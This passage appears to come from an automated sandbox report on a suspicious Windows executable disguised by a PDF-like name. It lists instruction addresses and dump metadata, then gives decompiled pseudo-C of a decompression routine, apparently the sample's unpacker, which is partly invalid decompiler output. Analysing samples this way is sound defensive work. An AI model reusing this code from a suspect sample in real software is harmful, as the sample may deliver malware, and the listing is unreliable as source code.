                                                                      0x004068f0
                                                                      0x004068f2
                                                                      0x004068f5
                                                                      0x004068f7
                                                                      0x004068fc
                                                                      0x004068ff
                                                                      0x00406902
                                                                      0x00406906
                                                                      0x0040690d
                                                                      0x00406910
                                                                      0x00406917
                                                                      0x0040691b
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x00406923
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x0040691d
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406912
                                                                      0x00406927
                                                                      0x0040692a
                                                                      0x00406948
                                                                      0x0040694a
                                                                      0x00000000
                                                                      0x0040692c
                                                                      0x0040692c
                                                                      0x0040692f
                                                                      0x00406932
                                                                      0x00406935
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x00406937
                                                                      0x0040693a
                                                                      0x0040693d
                                                                      0x0040693f
                                                                      0x00406940
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406943
                                                                      0x00000000
                                                                      0x00406b79
                                                                      0x00406b7d
                                                                      0x00406b9b
                                                                      0x00406b9e
                                                                      0x00406ba5
                                                                      0x00406ba8
                                                                      0x00406bab
                                                                      0x00406bae
                                                                      0x00406bb1
                                                                      0x00406bb4
                                                                      0x00406bb6
                                                                      0x00406bbd
                                                                      0x00406bbe
                                                                      0x00406bc0
                                                                      0x00406bc3
                                                                      0x00406bc6
                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c97
                                                                      0x00406c9b
                                                                      0x00406ca2
                                                                      0x00406ca5
                                                                      0x00406ca8
                                                                      0x00406cb2
                                                                      0x00000000
                                                                      0x00406cb2
                                                                      0x00406c9d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00406cd8
                                                                      0x00406cd8
                                                                      0x00406cdb
                                                                      0x00406cde
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00000000
                                                                      0x00406f43
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x00000000
                                                                      0x00407004
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00000000
                                                                      0x004070b6
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407066
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x00407098
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                                      • Instruction ID: 7ea7bfe366fdde138a2213b1adeace564b33d0438ed0be708c4ee64e1a3b53a1
                                                                      • Opcode Fuzzy Hash: 0898a8e2da4e1da6e9a921ed15670c8ccd525f320a25fb1a5aeeb31869c426e5
                                                                      • Instruction Fuzzy Hash: 50814531D04228DFDF24CFA8C884BADBBB1FB44305F25816AD856BB291C7789996CF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406B79 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406B79() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040717D))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
